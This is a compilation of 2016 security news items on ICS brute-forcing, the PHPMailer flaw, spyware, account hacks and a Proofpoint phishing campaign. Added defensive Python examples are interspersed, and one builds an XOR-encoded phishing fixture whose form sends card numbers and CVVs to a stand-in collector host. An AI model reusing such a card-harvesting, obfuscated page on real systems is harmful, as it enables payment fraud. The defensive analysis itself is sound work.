Downloading apps from third parties does not always end in malware, but it certainly raises the risk, so the safest course is to wait, to avoid compromising your device and the networks it accesses.
You can also go to Settings → Security and make sure "Unknown sources" option is turned off.

The number of ICS Attacks continues to increase worldwide
28.12.2016 securityaffairs

According to data provided by IBM Managed Security Services, the number of ICS attacks in 2016 continued to increase worldwide.
Industrial control systems (ICS) continue to be a privileged target for hackers. According to IBM Managed Security Services, the number of attacks on ICS increased by 110 percent in 2016 compared to 2015.

According to the researchers at IBM, the spike is associated with a significant increase in brute-force attacks on supervisory control and data acquisition (SCADA) systems.

ICS attacks 2016

IBM noticed an increase in ICS traffic caused by SCADA brute-force attacks; unfortunately, in some cases systems are exposed on the Internet with default credentials or weak passwords.

IBM warns of the availability of a penetration testing framework named smod that was used in a large number of attacks. The tool was published on GitHub in January 2016 and allows assessment of the Modbus serial communication protocol; it can also be used by attackers to power brute-force attacks.

“In January 2016, GitHub released a penetration testing solution that contained a brute-force tool that can be used against Modbus, a serial communication protocol. The public release and subsequent use of this tool by various unknown actors likely led to the rise in malicious activity against ICS in the past 12 months.” states the blog post published by IBM Managed Security Services.
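The brute-force activity IBM describes shows up on the network as bursts of connection attempts to the Modbus/TCP port (502) from a single source, which is something a defender can spot in ordinary connection logs. The following is an added example, not code from IBM or from the original article; it assumes a simple constructed log format ("<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port> <action>") and an alert threshold of 20 connections per source within 60 seconds, both of which are assumptions for the demo rather than values from the report.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

MODBUS_PORT = 502
WINDOW = timedelta(seconds=60)   # sliding window length (assumed tuning value)
THRESHOLD = 20                   # attempts per source within WINDOW before alerting (assumed)


def parse_line(line: str):
    """Parse one constructed log line into (timestamp, src_ip, dst_ip, dst_port, action)."""
    ts, src, _arrow, dst, action = line.split()
    host, port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, host, int(port), action


def detect_modbus_bursts(lines, window=WINDOW, threshold=THRESHOLD) -> dict:
    """Return {src_ip: time_of_first_alert} for sources that exceed the threshold.

    A per-source deque keeps only the timestamps inside the sliding window, so
    memory stays bounded by the number of attempts a source can make per window.
    """
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        ts, src, _host, port, _action = parse_line(line)
        if port != MODBUS_PORT:
            continue                       # only Modbus/TCP connections are of interest
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()                    # drop attempts that fell out of the window
        if len(q) >= threshold and src not in alerts:
            alerts[src] = ts
    return alerts


def make_sample_log() -> list:
    """Constructed sample log (not real traffic), sorted by timestamp."""
    base = datetime(2016, 12, 1, 8, 0, 0)
    lines = []
    # A legitimate HMI polling the PLC every five minutes.
    for i in range(3):
        lines.append(f"{(base + timedelta(minutes=5 * i)).isoformat()} "
                     f"10.0.0.5 -> 10.0.0.20:502 ACCEPT")
    # A source hammering the PLC's Modbus port: 25 connections in about 30 seconds.
    for i in range(25):
        lines.append(f"{(base + timedelta(seconds=2 + i)).isoformat()} "
                     f"203.0.113.77 -> 10.0.0.20:502 ACCEPT")
    # Unrelated traffic to a web port on the same host; must not count.
    for i in range(30):
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} "
                     f"198.51.100.9 -> 10.0.0.20:80 ACCEPT")
    return sorted(lines)


if __name__ == "__main__":
    for src, when in detect_modbus_bursts(make_sample_log()).items():
        print(f"ALERT {when.isoformat()} possible Modbus brute force from {src}")
```

Modbus itself carries no authentication, so rate and source reputation are the practical signals; the same sliding-window logic can be fed from firewall or NetFlow exports once the parser is adapted to their format.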

Analysis of the attack sources revealed that threat actors in the US accounted for the majority of ICS attacks in 2016 (60%), followed by Pakistan (20%) and China (12%). The United States also topped the list of the top 5 destination countries; experts consider this normal because the US has the largest number of internet-connected ICS systems in the world.

The report mentions the following three notable ICS attacks that occurred in recent years.

The 2013 New York dam attack. Iranian hackers penetrated the industrial control system of a dam near New York City in 2013, raising concerns about the security of US critical infrastructure.
The 2015 Ukrainian power outage. Experts speculated the involvement of the Russian Government. According to security experts, the BlackEnergy malware was a key element of the attack against Ukrainian power grid that caused the power outage.
The 2016 SFG malware attacks. The Labs team at SentinelOne recently discovered a sophisticated malware dubbed Furtim specifically targeting at least one European energy company.
The report warns organizations in every industry about cyber attacks against ICS systems and urges the adoption of the necessary countermeasures.

“Organizations across all verticals must take full responsibility for protecting their own assets and consumers. There should be no exceptions, since the best way to keep adversaries out of an ICS is to implement simple safeguards, best practices and risk management solutions.” states the report.

ISIS use of Telegram has definitively surpassed Twitter
28.12.2016 securityaffairs Cyber

Telegram is the ‘app of choice’ for ISIS members, its use has definitively surpassed Twitter and other social media platforms.
If you want to investigate ISIS activities, you have to be aware that Telegram is today its preferred channel for propaganda.

The use of the popular encrypted messaging app is widespread among the militants of the terrorist organization, and it has eclipsed the use of other social media platforms, including Twitter.

Social media platforms continue to ban content posted by ISIS members in an attempt to block their propaganda online.

Twitter continues to close hundreds of thousands of accounts for violating the company’s policies on violent extremism. In August Twitter published a blog post that revealed it has shut down 360,000 terrorist-related accounts since last year.

“Earlier this year, we announced we had suspended more than 125,000 accounts since mid-2015 for violating our longtime prohibition on violent threats and the promotion of terrorism and shared the steps we are taking as a company to combat this content.” states the post. “While our work is not done, today we are announcing that we have suspended an additional 235,000 accounts for violating our policies related to promotion of terrorism in the six months since our February 2016 post.”

In the weeks before the tragic Berlin attack, intelligence analysts observed many known IS Telegram channels sharing messages calling for volunteers for a holiday killing spree.

“Christmas, Hanukkah, and New Years Day is very soon,” states one of the messages cited by the Washington Post. “So let’s prepare a gift for the filthy pigs/apes.”

The reason for the widespread use of Telegram is the lack of repressive measures by the company against ISIS activities on its application.

“[Telegram is] the app of choice for many Isis, pro-Isis and other jihadi and terrorist elements.” states a report published by the Middle East Media Research Institute (MEMRI).

A previous report published by the MEMRI JTTM, titled “Jihadis Shift To Using Secure Communication App Telegram’s Channels Service” published October 29, 2015, noted that numerous jihadis and jihadi organizations had opened their own channels on Telegram.

ISIS and Al-Qaeda in the Arabian Peninsula (AQAP) opened several channels to allow secure communications among their members.

Telegram ISIS Channel

Nasher is the most popular multi-language set of channels of ISIS-related news on Telegram.

“‘Based on the rate at which new jihadi channels are emerging, and on the large number of members they are attracting, these channels can be expected to become a fertile and secure arena for jihad-related activities.’ This has indeed come to pass.” states the report.

According to the researchers, Telegram has surpassed Twitter as the most important platform of communication.

“It has surpassed Twitter as the most important platform,” said Steven Stalinsky, lead author of the report. “All the big groups are on it. We see Isis talking about the benefits of Telegram and encouraging its followers to use it.”

Telegram is easy to use and offers a number of different options for regular and encrypted communications.

“The West has been generally two steps behind the jihadis when it comes to cyber,” explained Steven Stalinsky, lead author at MEMRI. “Many people in government are still focused on Twitter, and they need to be. But what we tell them is, ‘That’s no longer the main story.’”

Once again, IS demonstrates the ability of its members to change tactics and tools in order to make the monitoring of their activities harder, while at the same time maximizing the benefits of the technology they use.

Lithuania government PCs infected by a Russian spyware
28.12.2016 securityaffairs

Lithuania says it found Russian spyware on its government computers, and the government blames Moscow for cyber espionage campaigns.
Lithuania blames Russia for cyber attacks that have hit government networks over the last two years. According to Reuters, the head of cyber security Rimtautas Cerniauskas confirmed the discovery of at least three cases of Russian spyware on government computers since 2015.

The Lithuanian officials targeted by the alleged Russian spyware held mid-to-low ranking positions in the government; nevertheless, Cerniauskas confirmed that their PCs contained sensitive government documents.

“The head of cyber security told Reuters three cases of Russian spyware on its government computers had been discovered since 2015, and there had been 20 attempts to infect them this year.” states the article published by Reuters.

“The spyware we found was operating for at least half a year before it was detected – similar to how it was in the USA,” said Rimtautas Cerniauskas.

Lithuania cyber espionage

The Russian government denies any involvement in the attacks; spokesman Dmitry Peskov told Reuters the accusations were “laughable” and unsubstantiated. Russian authorities pointed out that their networks are also targeted by hackers, but that Moscow has never accused other governments.

“Did it (the spyware) have ‘Made in Russia’ written on it?” quipped Peskov. “We absolutely refute this nonsense.”

Almost every government fears Russian nation-state actors; the cyber attacks surrounding the US presidential election and the string of incidents in Ukraine have heightened those fears.

According to German intelligence, the APT28 group, also known as Fancy Bear, is ramping up information warfare against Germany and the rest of the West to destabilize foreign governments.

“Lithuania, Estonia and Latvia, all ruled by Moscow in communist times, have been alarmed by Russia’s annexation of Ukraine’s Crimea peninsula in 2014 and its support for pro-Russian separatists in eastern Ukraine.” continues Reuters.

According to the Lithuanian intelligence services, the cyber attacks were politically motivated and threat actors conducted cyber espionage activities on state institutions.

The Russian spyware was used by the hackers to exfiltrate documents and to collect login credentials for popular web services such as Gmail and Facebook. The siphoned data were sent to an IP address linked to cyber espionage campaigns conducted by Russian cyber spies.

“This only confirms that attempts are made to infiltrate our political sphere,” said Cerniauskas.

“Russians are really quite good in this area. They have been using information warfare since the old times. Cyberspace is part of that, only more frowned upon by law than simple propaganda”, he added.

“They have capacity, they have the attitude, they are interested, and they will get to it – so we need to prepare for it and we need to apply countermeasures.”

This isn’t the first time that Russian hackers have targeted Lithuanian systems. According to the head of the Lithuanian counter-intelligence agency, Darius Jauniskis, in 2012 Moscow launched coordinated attacks against the Lithuanian central bank and a top online news website.

“It is all part of psychological warfare,” explained Jauniskis.

Hacked Sony Music Entertainment account tweeted about Britney Spears’s Death
27.12.2016 securityaffairs Hacking

Hackers compromised the Sony Music Entertainment Twitter account and posted messages announcing Britney Spears’s death. Experts blame the OurMine crew.
Sony Music Entertainment’s Twitter account was compromised and the hackers posted news of Britney Spears’s death.

“RIP @britneyspears #RIPBritney 1981-2016” and “Britney spears is dead by accident! We will tell you more soon #RIPBritney.” read the messages posted by the hackers.

Hacked Sony Music Entertainment account

Sony Music Entertainment quickly deleted the messages and confirmed the hack of its account.

“Sony Music Entertainment’s Twitter account was compromised. This has been rectified,” it said.

“Sony Music apologizes to Britney Spears and her fans for any confusion.”

Separately, the official Twitter account for Bob Dylan featured a tweet that read “Rest in peace @britneyspears,” but the message was later deleted.

Adam Leber, a spokesman for the pop star, told CNN the news was fake.

“I assume their account has been hacked,” said Spears’ manager, Adam Leber. “I haven’t spoken to anyone… as of yet but I am certain their account was hacked. Britney is fine and well. There have been a few Internet clowns over the years who have made similar claims about her death, but never from the official Sony Music Twitter account.”

Who is behind the hack?

Security experts suspect the account was hacked by the notorious hacker group OurMine, the same group that recently hacked the Netflix account and the accounts of many very important people.

OurMine is a well-known hacker group that has hacked multiple high-profile accounts, including those of Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta, Spotify CEO and founder Daniel Ek, former Twitter CEO Dick Costolo, Google CEO Sundar Pichai, and many others.

The group typically hacks accounts to demonstrate their poor security, then offers its consultancy services to prevent future attacks.

Two Tweets posted by the hacked Sony Music Entertainment’s Twitter account suggest the involvement of the OurMine Team:

“We detected unusual activity on the account and we checked the account if it’s hacked or not”, states one Tweet, followed by, “we saw a new IP logged in to the account a few minutes ago and the tweet is posted by a new IP so @britneyspears is still alive #OurMine”.

Hacked Sony Music Entertainment account

This isn’t the first time hackers have targeted Sony: in November 2014 the hacking group known as GOP broke into the company’s systems and stole sensitive information, including employee data.

The FBI blamed North Korea for that cyber attack.

Critical PHPMailer Flaw leaves Millions of Websites Vulnerable to Remote Exploit
26.12.2016 thehackernews 
A critical vulnerability has been discovered in PHPMailer, one of the most popular open source PHP libraries for sending email, used by more than 9 million users worldwide.
Millions of PHP websites and popular open source web applications, including WordPress, Drupal, 1CRM, SugarCRM, Yii, and Joomla, ship with the PHPMailer library to send email to their users using a variety of methods, including SMTP.

Discovered by Polish security researcher Dawid Golunski of Legal Hackers, the critical vulnerability (CVE-2016-10033) allows an attacker to remotely execute arbitrary code in the context of the web server and compromise the target web application.
"To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class," Golunski writes in the advisory published today.
Golunski responsibly reported the vulnerability to the developers, who have patched it in their new release. All versions of PHPMailer before the critical release 5.2.18 are affected, so web administrators and developers are strongly recommended to update to the patched release.

Since this is the first public report of the vulnerability following Golunski’s advisory, and millions of websites remain unpatched, the researcher has withheld further technical details about the flaw.
However, Golunski has promised to release more technical details about the vulnerability in coming days, including a proof-of-concept exploit code and video demonstration that will show the attack in action.
We will update this article with additional information on the PHPMailer vulnerability, exploit code and video demonstration, once the researcher makes it public.
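Because the technical details are withheld and the only stated remedy is updating to 5.2.18 or later, the immediate action for an administrator is to find every vendored copy of PHPMailer and compare its version against the patched release. The following is an added example, not code from the advisory, from PHPMailer or from the original article; it assumes PHPMailer 5.2.x ships as a file named class.phpmailer.php that declares its version in a `$Version = '...'` property, and the class file used in the demo is constructed inline.

```python
import os
import re
import tempfile

PATCHED = (5, 2, 18)   # first release fixing CVE-2016-10033, per the advisory
# Assumption: PHPMailer 5.2.x declares e.g.  public $Version = '5.2.14';
VERSION_RE = re.compile(r"""\$Version\s*=\s*['"]([0-9][0-9.]*)['"]""")


def parse_version(text: str):
    """Extract the version tuple from PHPMailer class source, or None if absent."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(version) -> bool:
    """True when a parsed version is older than the patched release."""
    return version is not None and version < PATCHED


def scan_tree(root: str) -> list:
    """Walk a web root and report (path, version, vulnerable) for each PHPMailer copy."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "class.phpmailer.php":
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                version = parse_version(fh.read())
            findings.append((path, version, is_vulnerable(version)))
    return findings


# Constructed stand-in for a vendored class file (not the real library source).
SAMPLE_CLASS_FILE = (
    "<?php\n"
    "class PHPMailer\n"
    "{\n"
    "    public $Version = '5.2.14';\n"
    "}\n"
)


def demo() -> list:
    """Build a throwaway tree containing the sample file and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        vendor = os.path.join(tmp, "vendor", "phpmailer", "phpmailer")
        os.makedirs(vendor)
        with open(os.path.join(vendor, "class.phpmailer.php"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_CLASS_FILE)
        return [(os.path.relpath(p, tmp), v, vuln) for p, v, vuln in scan_tree(tmp)]


if __name__ == "__main__":
    for path, version, vulnerable in demo():
        status = "VULNERABLE" if vulnerable else "ok"
        print(f"{status}: {path} version={'.'.join(map(str, version)) if version else '?'}")
```

A copy whose version cannot be parsed is reported with `None` rather than silently treated as safe, so it shows up for manual review; on a real server the scan would be run against the document root, and any find below 5.2.18 updated.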

Cyanogen is shutting down CyanogenMod, it will go on as Lineage, maybe
26.12.2016 securityaffairs OS

The most popular custom Android ROM, Cyanogen OS, announced that it is closing its services starting from December 31, 2016.
Bad news for users of the most popular custom Android ROM, the Cyanogen OS, that is now closing its services.

Cyanogen was launched with the intent to provide an improved version of the Google Android operating system but following some technical and potential legal issues, it decided to shut down its custom services.

CyanogenMod is a non-commercial operating system that implements features not available in the official firmware distributed by mobile device vendors.

It is managed by a community of developers led by Steve Kondik, who is one of the co-founders of Cyanogen.

“As part of the ongoing consolidation of Cyanogen, all services and Cyanogen-supported nightly builds will be discontinued no later than 12/31/16. The open source project and source code will remain available for anyone who wants to build CyanogenMod personally.” reads an official statement published on the official website.

The planned shutdown of Cyanogen was officially announced late Friday through a very brief blog post made by the company, saying “as part of the ongoing consolidation of Cyanogen,” it’s shutting down all services and nightly builds on December 31.

What does it mean for end-users?

Starting from January 2017, there will be no more Android ROM updates; however, the open source project and source code will remain available for those who want to build their own CyanogenMod.

Cyanogen will stop providing nightly builds and security updates for its OS; mobile devices running Cyanogen OS (e.g. the OnePlus One) will have to switch to the open-source version of CyanogenMod.

At the time of writing, www.cyanogenmod.org is down.

The CyanogenMod team has published a post confirming the shutdown of the CM infrastructure and revealing a plan to continue the open-source initiative as Lineage.

Below is the full message from the team:

“Last week, we released the final CM-13.0 releases, updated to the latest security patches, in anticipation of what follows.

Yesterday, Cyanogen Inc (Cyngn) announced that they were shutting down the infrastructure behind CyanogenMod (CM). This is an action that was not unpredictable given the public departure of Kondik (cyanogen himself) from the company, and with him our last remaining advocate inside Cyngn’s leadership.

In addition to infrastructure being retired, we in the CM community have lost our voice in the future direction of CM – the brand could be sold to a third party entity as it was an asset that Kondik risked to start his business and dream. Even if we were to regroup and rebuild our own infrastructure, continuing development of CM would mean to operate with the threat of sale of the brand looming over our heads. Then there is the stigma that has grown to be attached to anything named ‘Cyanogen’. Many of you reading this have been champions of clarifying that the CM product and CyngnOS were distinct, yet the stain of many PR actions from Cyngn is a hard one to remove from CM. Given CM’s reliance on Cyngn for monetary support and the shared source base, it’s not hard to understand why the confusion remains.

It will come as no surprise that this most recent action from Cyngn is definitely a death blow for CyanogenMod.

However, CM has always been more than the name and more than the infrastructure. CM has been a success based on the spirit, ingenuity and effort of its individual contributors – back when it was Kondik in his home, to the now thousands of contributors past and present.

Embracing that spirit, we the community of developers, designers, device maintainers and translators have taken the steps necessary to produce a fork of the CM source code and pending patches. This is more than just a ‘rebrand’. This fork will return to the grassroots community effort that used to define CM while maintaining the professional quality and reliability you have come to expect more recently.

CM has served the community well over its 8 long years. It has been our home, bringing together friends from all over the world to celebrate our joy of building and giving. It’s apt then that on this Eve of a holiday we pay our respects. We will take pride in our Lineage as we move forward and continue to build on its legacy.

Thank you & Goodbye,
The CyanogenMod Team”

Cyanogen shut down

The CyanogenMod community is now working to produce a fork of the CyanogenMod source code and pending patches.

The Android community believes that a new project, dubbed LineageOS, will carry on its legacy, but the project is still in its infancy.

According to the CyanogenMod (CM) team, Lineage “is more than just a ‘rebrand’” and “will return to the grassroots community effort that used to define CM while maintaining the professional quality and reliability you have come to expect more recently.”

If you are interested in LineageOS, take a look at its website; the files of the Lineage Android Distribution can be found in a repository on GitHub.

“So, yes, this is us. LineageOS will be a continuation of what CyanogenMod was. To quote Andy Rubin, this is the definition of open. A company pulling their support out of an open source project does not mean it has to die.” states the description about

Obama moves to end dual-hat arrangement separating Cybercom from NSA
26.12.2016 securityaffairs Cyber

President Obama has moved to end the dual-hat arrangement, separating the leadership of the U.S. Cyber Command from that of the National Security Agency.
Cyber security is one of the most important topics on the agenda of any government, and it will be one of the most debated topics at the next G7 summit, which will be held in Italy next year.

I’m currently working with the Cyber G7 Group, and I have the opportunity to analyze the approach of various states to the matter and to promote new initiatives aimed at harmonizing the cyber-security approach “of governments” by encouraging cooperation and avoiding situations of conflict.

Last week, President Obama moved to end the controversial dual-hat arrangement under which the National Security Agency and the U.S. Cyber Command (Cybercom) are headed by the same military officer.

The decision is very important and highlights the strategic importance of the mission assigned to the U.S. Cyber Command. According to a transition official quoted by the Washington Post, who spoke on the condition of anonymity, cybersecurity is one of the most important issues in the US security strategy.

“Cybersecurity has been and will be a central focus of the transition effort,” said the official.


The NSA and the U.S. Cyber Command have fundamentally different missions; for this reason, it is essential to separate their leadership.

Recall that the mission of the U.S. Cyber Command is to disrupt and destroy adversaries’ infrastructure and to defend the US against incoming cyber threats.

The documents leaked by Snowden clarify the mission of the NSA, which is more focused on intelligence operations against adversaries and foreign governments.

U.S. Cyber Command has grown over time, and its mission has become even clearer with increasing awareness of the cyber threat. Since the Stuxnet attack against the Natanz nuclear plant, something has changed permanently, and the dual-hat arrangement is no longer considered effective for the US cyber strategy.

“While the dual-hat arrangement was once appropriate in order to enable a fledgling Cybercom to leverage NSA’s advanced capabilities and expertise, Cybercom has since matured” to the point where it needs its own leader, Obama said in a statement accompanying his signing of the 2017 defense authorization bill.

Obama believes that Cybercom needs its own leader, as he confirmed in the statement accompanying his signing of the bill.

“The two organizations should have separate leaders who are able to devote themselves to each organization’s respective mission and responsibilities, but should continue to leverage the shared capabilities and synergies developed under the dual-hat arrangement,” Obama wrote about the dual-hat arrangement.

The Obama decision to separate the heads of the two organizations was supported by Defense Secretary Ashton B. Carter and Director of National Intelligence James R. Clapper Jr.

The idea of separating the heads of the two organizations is not new, President Obama proposed it back in 2013.

“Obama had been on the verge of ending the dual-hat leadership in late 2013 but was persuaded to hold off when senior officials, including the NSA’s director at the time, Army Gen. Keith B. Alexander, argued that the two agencies needed one leader to ensure that the NSA did not withhold resources from Cybercom.” wrote The Washington Post.

A presidential review commission called for the end of the dual-hat arrangement and suggested assigning the direction of the NSA to a civilian rather than a military official.

The bill that Obama signed bars the splitting of the leadership role until the defense secretary and the chairman of the Joint Chiefs of Staff jointly certify that to do so would not diminish Cybercom’s effectiveness.

“The Congress . . . should not place unnecessary and bureaucratic administrative burdens and conditions on ending the dual-hat arrangement at a time when the speed and nature of cyber threats requires agility in making decisions about how best to organize and manage the nation’s cyber capabilities,” added Obama.

The transition will not be instantaneous; the Pentagon and the Office of the Director of National Intelligence have planned a period during which the NSA can continue to “provide vital operational support” to Cybercom.

Cyanogen Shutting Down All Services; No More Android ROM Updates
26.12.2016 thehackernews  OS
A bittersweet Christmas and New Year for users and fans of the most popular custom Android ROM, Cyanogen OS.
Cyanogen, which tried and failed to kill Google's Android operating system, is now shutting down the custom services it provides to phones running its Cyanogen OS, as well as the "nightly builds" of that OS, on December 31st.
Cyanogen set out with the ambition to build better versions of the Android operating system than those created by Google itself, but following some technical and potential legal issues, the startup has decided to quit.

The planned shutdown of Cyanogen was officially announced late Friday through a very brief blog post made by the company, saying "as part of the ongoing consolidation of Cyanogen," it's shutting down all services and nightly builds on December 31.
"The open source project and source code will remain available for anyone who wants to build CyanogenMod personally," the blog reads.
What About Cyanogen OS-Powered Smartphones?
From January 2017, there will be no further updates to the Cyanogen OS, no more nightly builds, and no more security updates.
Eventually, smartphones running on the Cyanogen OS, like the original OnePlus One and Lenovo ZUK Z1, will have to switch to the open-source version of the CyanogenMod operating system.

CyanogenMod OS is not a commercial operating system and is managed by a community of developers led by Steve Kondik, the co-founder of Cyanogen.
'Death Blow' to CyanogenMod
However, the CyanogenMod team believes that the shutdown of Cyanogen is a "death blow" to CyanogenMod, as it announced just after Cyanogen's closure announcement.
The CyanogenMod team paid its respects to the community it served for more than eight long years and announced the next open-source Android project.
Embracing the spirit of Cyanogen, the CyanogenMod team of developers, designers, device maintainers, and translators is now working to produce a fork of the CyanogenMod source code and pending patches.
Next? CyanogenMod Team Launches Lineage OS
While both Cyanogen and CyanogenMod are saying goodbye this year, the spirit of CyanogenMod will continue to live on in the new open source project.
Dubbed LineageOS, the new OS is still in its inception phase, and it will take some time before people see any progress from the newly formed group.
According to the CyanogenMod (CM) team, Lineage "is more than just a ‘rebrand’" and "will return to the grassroots community effort that used to define CM while maintaining the professional quality and reliability you have come to expect more recently."
A website is being developed for LineageOS, and a GitHub repository, called Lineage Android Distribution, has already been populated with CM files. The beginning of this new open source project "will be a continuation of what CyanogenMod was."

Hacker Interviews – R.I.U. crip (@cripthepoodle) – Security Affairs
26.12.2016 securityaffairs 

@cripthepoodle is one of the members of the dreaded PoodleCorp hacker crew; recently he targeted the Steam platform. Let’s meet him.

You are a talented hacker who is very active online; could you tell me more about yourself? Could you tell me what your technical background is and when you started hacking?

I started to get into coding Java in 2010, then met people on Xbox who enjoyed the stuff I liked to do; those people are Jordie and Kyle.

Which are your motivations?

My motivation is just to cause chaos for fun and make some money

What was your greatest hacking challenge? Which was your latest hack? Can you describe it to me?

I never really had a challenge, except when I first started and I helped para and anti attempt to get root on .mil, which went horribly wrong rofl, which wasn’t my fault btw.

My latest attack was on Steam at approximately 10:40 am on December 23rd, and I did the attack by being behind iptables on a Linux VPS and dropping all UDP packets; those packets are going to hit the servers, then boom, it’s offline.

What are the 4 tools that cannot be missed in the hacker’s arsenal and why?

4 tools? I honestly don’t know. Everyone has a different skill set; I’m not the smartest person in the “scene”.

Which are the most interesting hacking communities on the web today, why?

The most interesting is probably Twitter because it’s fun to mess with people but the most serious are IRC chats that are used by a lot of smart guys.

Did you participate in hacking attacks against the IS propaganda online? When? How? Where do you find IS people to hack?

No, I wasn’t behind that.

How do you choose your targets?

I choose my targets by asking my fans or asking people what they think would be the best one.

We often hear about cyber weapons and cyber attacks against critical infrastructure. Do you believe the risk of a major and lethal cyber attack against critical infrastructure is real?

Definitely yes

Cryptolulz666 hacked the Dutch Chamber of Commerce in HK
26.12.2016 securityaffairs Hacking

@Cryptolulz666 and his colleague Kapustkiy broke into another website belonging to an HK corporation, the Dutch Chamber of Commerce.
The hacker @Cryptolulz666, with a little help from the colleague Kapustkiy, has broken into the website of the Dutch Chamber of Commerce in Hong Kong (http://www.dutchchamber.hk/).

The hacker accessed data belonging to around 200 users, but he decided to leak only half of them as proof of the hack.
Cryptolulz666 told me he exploited a SQL injection vulnerability affecting the website.

A few days ago, he hacked the “The Standard Hong Kong” newspaper; he confirmed to me that his choice is not accidental, as he wants to target organizations in Hong Kong.

“Yes … As you’ve seen in the previous hack, I chose a big corporation in Hong Kong and I succeeded… this time I also chose Hong Kong because I want to make an impact on this country,” he told me. “No country is safe.”
He highlighted the fact that a silly flaw like a SQL Injection could have serious consequences if admins ignore the pillars of security.

Data leaked on Pastebin includes data related to companies working with the Dutch Chamber of Commerce.

Cryptolulz (@Cryptolulz666) is a former member of the Powerful Greek Army who has hacked several government websites, including that of the Russian embassy in Armenia (www.embassyru.am).

He also launched DDoS attacks against the website http://italiastartupvisa.mise.gov.it/ belonging to the Italian Government and the website of the Russian Federal Drug Control Service liquidation commission.

The Turkish Government is investigating more than 10,000 people in terror probe

26.12.2016 securityaffairs  Cyber

The Turkish Government is investigating 10,000 people suspected of terror-related activity on the internet, accused of propaganda or apologizing for terrorism.
The Turkish authorities are investigating more than 10,000 individuals over online terror-related activities. The suspects are accused of sharing material and posts against government officials.

According to the Interior Ministry, the inquiries are part of the “fight against terrorism, which continues with determination everywhere, including on social networks.”

The pressure from the Turkish government has been increasing since the coup attempt in July. Authorities are applying strict censorship to the online activities of citizens.

The Turkish Government has applied restrictions on the Tor anonymity network and, more generally, on all VPN services, which could be used to evade censorship.

“Turkey declared a state of emergency and launched deep purges of perceived opponents, sparking concern among human rights groups which accuse Ankara of repression.” reported The SUN.

The Turkish authorities have questioned more than 3,000 people in the last six months; 1,656 of them have been arrested, and 84 are still being questioned.


The accusation for them is “propaganda or apologizing for terrorism” and “insulting state officials.”

The situation in the country has been aggravated by the assassination of the Russian Ambassador Andrei Karlov, which occurred last week during an exhibition in Ankara. Investigators believe the assassination is part of a terrorist plot to destabilize the relationship between Russia and Turkey.

The Turkish Government fears possible interference through social media; Twitter and YouTube have been slowed since the publication of a video in which members of ISIS burned alive two captured Turkish soldiers.

Malware distribution tactics used in phishing campaign
25.12.2016 securityaffairs

Experts from Proofpoint discovered a new phishing campaign designed to steal banking data leveraging tactics associated with malware distribution.
Security experts from Proofpoint have discovered a new phishing campaign that presents many similarities with campaigns used to spread the Cerber ransomware and the Ursnif banking Trojan.

Cyber criminals adopted a technique that relies on the distribution of a password-protected .zip archive containing a malicious document. The email messages sent by the crooks carry the .zip file as an attachment, and the message body includes the password needed to open the archive.

The phishing campaign, by contrast, aims to steal credit card data from the victims: the criminals send them a password-protected HTML attachment.


The email displays what appear to be the first digits of the victim’s credit card account number, aiming to create a sense of legitimacy without requiring actual knowledge of the potential victim’s card number.

The email attempts to trick victims into giving away their credit card data by creating a sense of urgency, requesting that recipients update their security information for their “new chip card.”

“The email sample that we analyzed was personalized with the recipient’s name and what appear to be the starting digits of their credit card account number. The starting digits for credit cards are standardized, though, so this just adds to the apparent legitimacy of the carefully crafted emails without requiring actual knowledge of the recipient’s card number,” states the report published by Proofpoint. “The emails also use stolen branding and social engineering to create a sense of urgency encouraging the recipient to update security information for their ‘new chip card.’”


The HTML file attachment used in this campaign was XOR-encoded to make dynamic analysis harder.

Researchers noticed that the HTML attachment uses JavaScript to implement the password protection, instead of relying on the password-protection feature of Microsoft Word.

When the victim enters the password, the HTML attachment is decrypted and a typical credit card phishing template, complete with stolen branding, is displayed.

“Credential and credit card phishing are nearly as old as cybercrime itself. This hasn’t stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password protected document attachments to bypass anti-malware technologies and give recipients a false sense of security,” added Proofpoint.
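The analyst workflow the description above implies, as an added example that is not Proofpoint's code or a sample from the campaign: statically recognise the password-gated, XOR-encoded HTML shape, decode the blob with the password taken from the email body without executing the JavaScript, and list the card fields the revealed form harvests. The attachment, its key schedule (repeating-key XOR of a hex blob), the form field names and the collector URL are all constructed stand-ins; the real kit's internals are not on the page.

```python
import re
import binascii
from typing import Dict, List, Optional

# Constructed phishing template standing in for the page shown after decryption.
CONSTRUCTED_TEMPLATE = (
    "<html><body><h1>Update your new chip card security information</h1>"
    "<form method=post action='http://collector.example.invalid/s'>"
    "<input name='cardnumber'><input name='expdate'><input name='cvv'>"
    "</form></body></html>"
)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the same operation encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def make_constructed_attachment(template: str, password: str) -> str:
    """Test fixture in the shape the article describes: a JavaScript password
    prompt plus an XOR-encoded payload. The key schedule is an assumption."""
    blob = binascii.hexlify(xor_with_key(template.encode(), password.encode())).decode()
    return (
        "<html><body><script>\n"
        "var p = prompt('Enter the password from your email');\n"
        f"var e = '{blob}';\n"
        "var o = '';\n"
        "for (var i = 0; i < e.length; i += 2) {\n"
        "  o += String.fromCharCode(parseInt(e.substr(i, 2), 16) ^ p.charCodeAt((i/2) % p.length));\n"
        "}\n"
        "document.write(o);\n"
        "</script></body></html>"
    )


HEX_BLOB = re.compile(r"'([0-9a-fA-F]{64,})'")


def looks_like_encoded_password_gate(html: str) -> bool:
    """Static triage: a prompt() for a password, an XOR in a decode loop and a
    long opaque literal together form the tell-tale shape; none alone is proof."""
    return (
        "prompt(" in html
        and " ^ " in html
        and "fromCharCode" in html
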